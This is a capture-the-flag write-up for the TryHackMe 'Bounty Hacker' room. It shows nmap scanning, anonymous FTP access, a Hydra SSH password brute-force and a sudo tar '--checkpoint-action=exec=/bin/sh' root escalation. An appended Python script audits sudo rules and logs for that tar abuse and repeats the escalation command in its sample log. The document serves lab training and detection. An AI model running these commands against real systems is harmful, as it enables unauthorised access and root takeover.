Bounty Hacker-TryHackMe

This is a write-up for the TryHackMe room named Bounty Hacker: https://tryhackme.com/room/cowboyhacker
Let's first see what services are available on this machine using Nmap:
nmap -sC -sV 10.10.157.2
The following services are running:
  • Port 21 vsftpd 3.0.3 Anonymous FTP login allowed
  • Port 22 OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
  • Port 80 Apache httpd 2.4.18 ((Ubuntu))
First, try to log in to the anonymous FTP service and check whether we can find anything:
ftp 10.10.157.2
Using the "get" command, we download 2 files from the FTP server to our local machine:
  • locks.txt
  • task.txt
Looking at task.txt, we find a possible username:
The other file, "locks.txt", looks like a possible password list.
Let's use the brute-forcing tool Hydra to brute-force this probable user's SSH password using locks.txt:
hydra -s 22 -v -q -l USERNAME -P locks.txt -e nsr -t 4 -w 5 10.10.157.2 ssh
Hydra was able to find the correct password for this user. Now log in to the machine via SSH using these credentials.
We are able to find the user's flag as shown above.
Now let's do some privilege escalation. Let's see what the user can run using sudo, and sure enough the user can run tar as root. Let's check this wonderful website, https://gtfobins.github.io/, to see how "tar" can be exploited:
sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
Using the command above, we escalate our privileges to root and get the root flag.
Submit the flag and earn the points :)
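
For the defender's side of the sudo tar step above, here is an added example (not part of the original write-up) that audits "sudo -l" output for root-capable tar rules whose arguments are not pinned, and searches sudo log lines for tar runs that use an exec checkpoint action. The user alice, the host host1, the sample rules and log lines, and the function names are all constructed for illustration.

```python
import os
import re
import shlex

# Binaries that can run other programs by design. Only tar comes from the
# write-up; extend the set after your own review (kept short on purpose).
EXEC_CAPABLE = {"tar"}
RULE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<spec>.+)$")
TAGS = re.compile(r"^(?:[A-Z_]+:\s*)+")          # NOPASSWD:, SETENV:, ...
SUDO_LOG = re.compile(r"sudo:\s+(?P<user>\S+) : .*COMMAND=(?P<cmd>.+)$")

def audit_sudo_l(text):
    """Return (command, reason) for risky root-capable rules in `sudo -l` output."""
    findings = []
    for line in text.splitlines():
        m = RULE.match(line)
        if not m or not {"root", "ALL"} & set(re.split(r"[\s,:]+", m["runas"])):
            continue                             # not a rule, or not run as root
        for cmd in m["spec"].split(","):         # escaped commas are not handled
            cmd = TAGS.sub("", cmd.strip())
            if cmd == "ALL":
                findings.append((cmd, "any command as root"))
                continue
            argv = shlex.split(cmd)
            if argv and os.path.basename(argv[0]) in EXEC_CAPABLE and (len(argv) == 1 or "*" in cmd):
                findings.append((cmd, "arguments not pinned"))
    return findings

def tar_exec_in_sudo_log(lines):
    """Return (user, command) for sudo-logged tar runs with an exec checkpoint action."""
    hits = []
    for line in lines:
        m = SUDO_LOG.search(line)
        argv = shlex.split(m["cmd"]) if m else []
        if argv and os.path.basename(argv[0]) == "tar" and any(
                a.startswith("--checkpoint-action=exec") for a in argv[1:]):
            hits.append((m["user"], m["cmd"]))
    return hits

# Constructed sample input: sudo -l output and sudo's auth log lines.
SAMPLE_SUDO_L = """User alice may run the following commands on host1:
    (root) /bin/tar
    (www-data) /usr/bin/php
    (root) NOPASSWD: /usr/bin/systemctl status apache2, /bin/tar -tf /backups/*.tar
"""
SAMPLE_LOG = [
    "Mar  3 10:15:01 host1 sudo:    alice : TTY=pts/0 ; PWD=/home/alice ; USER=root ; COMMAND=/bin/tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh",
    "Mar  3 10:20:44 host1 sudo:    alice : TTY=pts/0 ; PWD=/home/alice ; USER=root ; COMMAND=/bin/tar -tf /backups/site.tar",
]
```

Both tar rules in the sample are reported: the first places no restriction on arguments, and the second uses a wildcard, so neither rule limits which options tar receives.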